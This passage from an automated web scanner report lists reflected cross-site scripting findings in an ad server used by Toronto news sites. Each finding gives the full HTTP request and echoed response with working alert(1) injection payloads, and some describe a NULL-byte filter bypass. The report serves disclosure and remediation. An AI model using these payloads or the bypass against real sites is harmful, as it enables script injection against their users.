if ('906389'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/906389/0/170/AdId=1215286;BnId=3;itime=352643759;nodecode=yes;link=31f3a'-alert(1)-'eea6890dad0')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE906389+"'))";
AT_TARGET906389="_self";
}
window.AT_ClickFn906389= function (click)
{    click=(isNaN(
...[SNIP]...

2.100. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906389/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0ee5"-alert(1)-"4381c289514 was submitted at the end of the semicolon-delimited path segment, as the value of rdclick= (reported by the scanner as the loc parameter, since it treats the whole segment loc=100;...;rdclick=... as one parameter). This input was echoed unmodified in the application's response as the link= value inside the double-quoted string passed to escape() when AT_MULTICLICKSTR is built; the unescaped " closes the literal and -alert(1)- is evaluated as code.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906389/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_300x250_1;size=300x250;key=;grp=124;misc=1290352493311;aduho=-360;rdclick=e0ee5"-alert(1)-"4381c289514 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.128B36.2.DD494.51.0.4CE937E1.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.9.DD495.52.0.4CE93801.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:21 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19030

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/906389/0/170/AdId=1215286;BnId=9;itime=352640841;nodecode=yes;link=e0ee5"-alert(1)-"4381c289514") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.101. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906389/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7fb6"-alert(1)-"4d05cc0dc37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906389/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_300x250_1;size=300x250;key=;grp=124;misc=1290352493311;aduho=-360;rdclick=&a7fb6"-alert(1)-"4d05cc0dc37=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.128B36.2.DD494.51.0.4CE937E1.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.5.DD495.52.0.4CE93806.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:26 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19062

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
LICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/906389/0/170/AdId=1215286;BnId=5;itime=352645188;nodecode=yes;link=&a7fb6"-alert(1)-"4d05cc0dc37=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.102. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/906389/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39bc6'-alert(1)-'982ecd8590b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/906389/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults_hub_300x250_1;size=300x250;key=;grp=124;misc=1290352493311;aduho=-360;rdclick=&39bc6'-alert(1)-'982ecd8590b=1 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.128B36.2.DD494.51.0.4CE937E1.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: 1=AE775A24.128B36.1.DD495.52.0.4CE93809.D5E75.8E869E.145E.1;expires=Sun, 28 Nov 2010 15:17:29 GMT;domain=adserver.adtechus.com;path=/
Content-Length: 19057

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
shClick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('906389'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/906389/0/170/AdId=1215286;BnId=1;itime=352648984;nodecode=yes;link=&39bc6'-alert(1)-'982ecd8590b=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE906389+"'))";
AT_TARGET906389="_self";
}
window.AT_ClickFn906389= function (click)
{    click=(isNa
...[SNIP]...

2.103. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965516/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00d4d30"-alert(1)-"180baf913e4 was submitted at the end of the semicolon-delimited path segment, as the value of rdclick= (reported by the scanner as the loc parameter, since it treats the whole segment loc=100;...;rdclick=... as one parameter). The scanner records the input as echoed as d4d30"-alert(1)-"180baf913e4; the captured response below, however, contains link=%00d4d30"-alert(1)-"180baf913e4, so the three characters %00 were reflected verbatim rather than decoded to a NULL byte. The breakout itself depends only on the unescaped " that closes the double-quoted string literal and lets -alert(1)- evaluate as code.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The scanner's interpretation is that the application blocks certain characters commonly used in XSS attacks and that the block can be circumvented by placing a URL-encoded NULL byte (%00) anywhere before them. This is inferred from the behaviour of its probes; the captured exchange shows neither the filter nor a decoded NULL byte.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965516/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_237x90_1;size=237x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207912904;aduho=-360;rdclick=%00d4d30"-alert(1)-"180baf913e4 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1630

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=210248276;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%00d4d30"-alert(1)-"180baf913e4http://adserver.adtechus.com/adlink/3.0/5294.1/1352306/0/2666/ADTECH;loc=300;key=key1+key2+key3+key4;rdclick=http://adserver.adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=210248276;k
...[SNIP]...

2.104. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965516/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fc86'-alert(1)-'0fd1721a4b8 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965516/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_237x90_1;size=237x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207895078;aduho=-360;rdclick=6fc86'-alert(1)-'0fd1721a4b8 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 414

document.write('<a href="6fc86'-alert(1)-'0fd1721a4b8http://adserver.adtechus.com/?adlink/5214/965516/0/2666/AdId=503987;BnId=3;itime=210247317;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" tar
...[SNIP]...

2.105. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965516/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707cb'-alert(1)-'be5fd5752e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965516/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_237x90_1;size=237x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207895078;aduho=-360;rdclick=&707cb'-alert(1)-'be5fd5752e4=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1630

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
r.adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=210248425;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&707cb'-alert(1)-'be5fd5752e4=1">
...[SNIP]...

2.106. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965516/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %003a728"-alert(1)-"666952faf27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a728"-alert(1)-"666952faf27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965516/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_237x90_1;size=237x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207883925;aduho=-360;rdclick=&%003a728"-alert(1)-"666952faf27=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1612

document.write("\n");
var curDateTime = new Date();
var offset = -(curDateTime.getTimezoneOffset());
if (offset > 0)
offset = "+" + offset;
if (window.adgroupid == undefined) {
window.adgroupid = Math
...[SNIP]...
dserver.adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=224506911;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&%003a728"-alert(1)-"666952faf27=1http://adserver.adtechus.com/adlink/3.0/5294.1/1352306/0/2666/ADTECH;loc=300;key=key1+key2+key3+key4;rdclick=http://adserver.adtechus.com/adlink/5214/965516/0/2666/AdId=1084099;BnId=1;itime=224506911
...[SNIP]...

2.107. http://adserver.adtechus.com/addyn/3.0/5214.1/965547/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965547/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e102c"-alert(1)-"56d9eef452d was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965547/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x50_1;size=300x50;key=;grp=353;misc=1290373582825;aduho=-360;rdclick=e102c"-alert(1)-"56d9eef452d HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1905

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965547/0/711/AdId=458978;BnId=1;itime=384581719;nodecode=yes;link=e102c"-alert(1)-"56d9eef452dhttp://www.toronto.com\" target=\"_blank\">
...[SNIP]...

2.108. http://adserver.adtechus.com/addyn/3.0/5214.1/965547/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965547/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb7f5"-alert(1)-"666ab63a259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965547/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x50_1;size=300x50;key=;grp=353;misc=1290373582825;aduho=-360;rdclick=&eb7f5"-alert(1)-"666ab63a259=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1908

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965547/0/711/AdId=458978;BnId=1;itime=384583783;nodecode=yes;link=&eb7f5"-alert(1)-"666ab63a259=1http://www.toronto.com\" target=\"_blank\">
...[SNIP]...

2.109. http://adserver.adtechus.com/addyn/3.0/5214.1/965555/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965555/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c09"-alert(1)-"f1e8ed5056c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965555/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_728x90_1;size=728x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207895190;aduho=-360;rdclick=d2c09"-alert(1)-"f1e8ed5056c HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Type: application/x-javascript
Content-Length: 563

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=728x90&section=786976&pub_redirect_unencoded=1&pub_redirect=http
...[SNIP]...
rver.adtechus.com/adlink/5214/965555/0/225/AdId=607818;BnId=3;itime=210248828;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=d2c09"-alert(1)-"f1e8ed5056c\">
...[SNIP]...

2.110. http://adserver.adtechus.com/addyn/3.0/5214.1/965555/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965555/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db767"-alert(1)-"d499c938fdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965555/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_728x90_1;size=728x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207895190;aduho=-360;rdclick=&db767"-alert(1)-"d499c938fdb=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Type: application/x-javascript
Content-Length: 568

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=728x90&section=1280301&pub_redirect_unencoded=1&pub_redirect=htt
...[SNIP]...
er.adtechus.com/adlink/5214/965555/0/225/AdId=1014032;BnId=3;itime=210249252;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&db767"-alert(1)-"d499c938fdb=1\">
...[SNIP]...

2.111. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965578/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3672b"-alert(1)-"d43ce14780a was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

